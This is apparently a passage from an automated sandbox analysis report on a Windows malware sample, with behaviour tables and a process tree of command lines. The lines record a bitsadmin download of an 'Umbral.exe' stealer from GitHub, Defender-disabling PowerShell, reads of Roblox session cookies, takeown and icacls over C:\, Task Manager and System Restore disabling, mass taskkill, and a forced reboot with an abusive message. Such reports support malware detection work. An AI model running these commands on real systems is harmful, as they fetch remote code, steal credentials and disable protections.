File opened for modification C:\Program Files\Java\jre-1.8\bin\server\classes.jsa C:\Windows\system32\cmd.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\melter.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1840 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe C:\Windows\system32\cmd.exe
PID 4364 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 4364 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 4364 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 4364 wrote to memory of 5012 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
PID 4364 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 4364 wrote to memory of 3356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\takeown.exe
PID 4364 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4364 wrote to memory of 4428 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 4364 wrote to memory of 3584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4364 wrote to memory of 3584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4364 wrote to memory of 3492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4364 wrote to memory of 3492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4364 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4364 wrote to memory of 4752 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 5012 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 5012 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 4364 wrote to memory of 468 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4364 wrote to memory of 468 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4364 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4364 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 5012 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\attrib.exe
PID 5012 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\attrib.exe
PID 5012 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5012 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5012 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5012 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5012 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5012 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5012 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5012 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5012 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 5012 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 5012 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 5012 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 5012 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 5012 wrote to memory of 1968 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 5012 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5012 wrote to memory of 2368 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5012 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 5012 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\System32\Wbem\wmic.exe
PID 5012 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\cmd.exe
PID 5012 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\Umbral.exe C:\Windows\SYSTEM32\cmd.exe
PID 2252 wrote to memory of 4816 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 2252 wrote to memory of 4816 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 4364 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4364 wrote to memory of 4044 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4364 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4364 wrote to memory of 5028 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4364 wrote to memory of 3912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4364 wrote to memory of 3912 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4364 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4364 wrote to memory of 2924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4364 wrote to memory of 3492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4364 wrote to memory of 3492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4364 wrote to memory of 2652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4364 wrote to memory of 2652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4364 wrote to memory of 2108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4364 wrote to memory of 2108 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4364 wrote to memory of 3780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4364 wrote to memory of 3780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\rundll32.exe
PID 4364 wrote to memory of 3280 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4364 wrote to memory of 3280 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe

"C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8628.tmp\8629.tmp\862A.bat C:\Users\Admin\AppData\Local\Temp\ea94c83ccab9fd5d21c2776d6e288ccdd95c8aa827b8e314316435424c0f9093.exe"

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe

C:\Users\Admin\AppData\Local\Temp\Umbral.exe

"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Windows\system32\takeown.exe

takeown /f C:\*.*

C:\Windows\system32\icacls.exe

Icacls C:\*.* /C /G Admin:F

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14329.vbs"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21446.vbs"

C:\Windows\system32\timeout.exe

timeout 60

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\rundll32.exe

rundll32 user32.dll, SwapMouseButton

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19074.vbs"

C:\Windows\system32\timeout.exe

timeout 14

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4fc 0x340

C:\Windows\system32\taskkill.exe

taskkill /F /IM hl2.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM javaw.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM RobloxPlayerBeta.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM FortniteClient-Win64-Shipping.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM GenshinImpact.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM Among Us.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM firefox.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM msedge.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM iexplore.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\system32\shutdown.exe

shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26117.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\19267.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26847.vbs"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2561.vbs" 19628.bat

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\19628.bat" "

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Users\Admin\AppData\Local\Temp\melter.exe

melter.exe

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28486.vbs"

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f

C:\Windows\system32\reg.exe

reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f

C:\Windows\system32\reg.exe

